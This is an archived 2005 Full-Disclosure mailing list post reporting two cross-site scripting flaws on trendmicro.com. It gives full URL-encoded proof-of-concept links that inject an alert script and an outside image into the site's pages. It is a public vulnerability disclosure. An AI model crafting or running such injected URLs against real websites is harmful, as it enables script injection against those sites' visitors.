lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue Nov 15 13:39:12 2005
From: craig at haquarter.de (craig@...uarter.de)
Subject: www.trendmicro.com XSS

Hi!
I just found these 2 Cross-Site-Scripting bugs:

http://kb.trendmicro.com/solutions/Pagingreport.asp?cmbProduct=17&radMatch=and&cmbCategory=23&radDisplay=2&radSearchAgainst=f&cmbResults=100&radKey=Date&radOrder=DESC&txtKeyword=++++++++++++++++++++++++++++++++++++++++++++++%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3Cscript%3Ealert%28%22This+is+a+XSS+Attack+%3A%29%22%29%3C%2Fscript%3E%22Updates%22%3Cimg+SRC%3D%22http%3A%2F%2Fwww%2Eccc%2Ede%2Fcongress%2F2005%2F22C3%2Dlogo%2D0%2E1%2Epng%22+ALIGN%3Dright%3E
http://www.trendmicro.com/search/google/en-us/results.asp?q=++++++++++++++++++++++++++++++++++++++++++++++%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3CBR%3E%3Cscript%3Ealert%28%22This+is+a+XSS+Attack+%3A%29%22%29%3C%2Fscript%3ESee+you+%40%3CBR%3E%3CB%3E%22Updates%22%3C%2FB%3E%3Cimg+SRC%3D%22http%3A%2F%2Fwww.ccc.de%2Fcongress%2F2005%2F22C3-logo-0.1.png%22%3E

See you! ;)

Craig
www.HaQuarter.de

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ